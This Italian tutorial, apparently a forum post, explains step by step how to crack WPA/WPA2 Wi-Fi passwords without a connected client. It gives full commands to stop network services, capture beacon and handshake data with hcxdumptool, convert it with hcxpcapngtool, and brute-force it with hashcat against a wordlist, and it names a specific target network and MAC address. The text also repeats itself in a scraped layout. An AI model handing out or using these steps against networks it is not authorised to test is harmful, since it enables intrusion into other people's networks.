Ultima modifica:
Oggi vediamo come craccare una rete WPA/WPA2 utlizzando hashcat, hcxdumptool e hcxpcapngtool, il vantaggio di questo metodo è che nessun client deve essere collegato alla rete, a differenza della suite di Aircrack-ng, Questo metodo personalemente lo userei solo se nessun client è connesso, essendo che è un po più lungo rispetto al crack con aircrack-ng.
Hashcat e installato di default, ma gli altri due no, quindi lo facciamo noi manualmente:
Se non siete su Kali dovete clonare la repository di github e installare hashcat:
Ora è tutto pronto. possiamo iniziare
1. Stoppare i servizi di rete
Come prima cosa andiamo a stoppare i servizi di rete :
Ora possiamo partire veramente.
2. Catturare informazioni con hcxdumptool
Adesso con hcxdumptool andiamo a catturare tutte le reti Wi-Fi:
Tutto le info che hcxdump riuscirà a prendere andranno nel file
Ora possiamo startare nuovamente i servizi di rete:
Ora convertiamo il file
Scriviamo ls per vedere il contenuto della directory, come si può vedere sono stati creati due file nuovi:
Quest'ultimo contiene tutti gli essid delle reti che hcxdumptool è riuscito ad individuare, quella che ci interessa a noi e
3. Scoprire il MAC address delle reti con hcxdumptool
Ora dobbiamo nuovamente stoppare i servizi di rete, una volta fatto questo mettiamo il comando, partirà una scansione in stile Airodump-ng:
Salviamoci il MAC address e apriamo con la GUI il file
Ora elimiano tutti gli altri hash e teniamo solo l'hash della rete che vogliamo attaccare.
4. Session-Cracking con Hashcat
Ora passiamo alla parte più bella, quella di crack, usiamo o creiamo una wordlist, per vedere le wordlist su Kali bisogna andare nella directory
Ora aspettiamo che Hashcat finisca, da VM sarà abbastanza lento, semmai spostate il file con l'hash sul proprio main OS(Sia Windows, Linux e Mac OS).
Crediti: David Bombal
Hashcat e installato di default, ma gli altri due no, quindi lo facciamo noi manualmente:
Bash:
sudo apt update
sudo apt install hcxdumptool
sudo apt install hcxpcapngtool
Bash:
sudo apt update
sudo apt install hashcat
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config
make
make install (as super user)
1. Stoppare i servizi di rete
Come prima cosa andiamo a stoppare i servizi di rete :
Bash:
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
2. Catturare informazioni con hcxdumptool
Adesso con hcxdumptool andiamo a catturare tutte le reti Wi-Fi:
Bash:
sudo hcxdumptool -i wlan0 -o capture.pcapng --active_beacon --enable_status=1
dumpfile.pcapng
.Ora possiamo startare nuovamente i servizi di rete:
Bash:
sudo systemctl start NetworkManager.service
sudo systemctl start wpa_supplicant.service
.pcapng
in un file .hc22000
in modo che hashcat possa craccarlo:
Codice:
sudo hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
- hash.hc22000
- essidlist
Wind3 HUB-7C435E
.3. Scoprire il MAC address delle reti con hcxdumptool
Ora dobbiamo nuovamente stoppare i servizi di rete, una volta fatto questo mettiamo il comando, partirà una scansione in stile Airodump-ng:
Bash:
hcxpdumptool --do_rcascan -i wlan0
hash.hc22000
, CTRL+F e mettiamo nella barra di ricerca il MAC address della rete che vogliamo craccare, nel mio caso è b8d5267c435e
:4. Session-Cracking con Hashcat
Ora passiamo alla parte più bella, quella di crack, usiamo o creiamo una wordlist, per vedere le wordlist su Kali bisogna andare nella directory
/usr/share/wordlist
, io ho creato la mia, crackthiswifi.txt
, scriviamo:
Codice:
hashcat -m 22000 hash.hc22000 crackthiswifi.txt #voi ovviamente dovete mettere il path della vostra wordlist
Crediti: David Bombal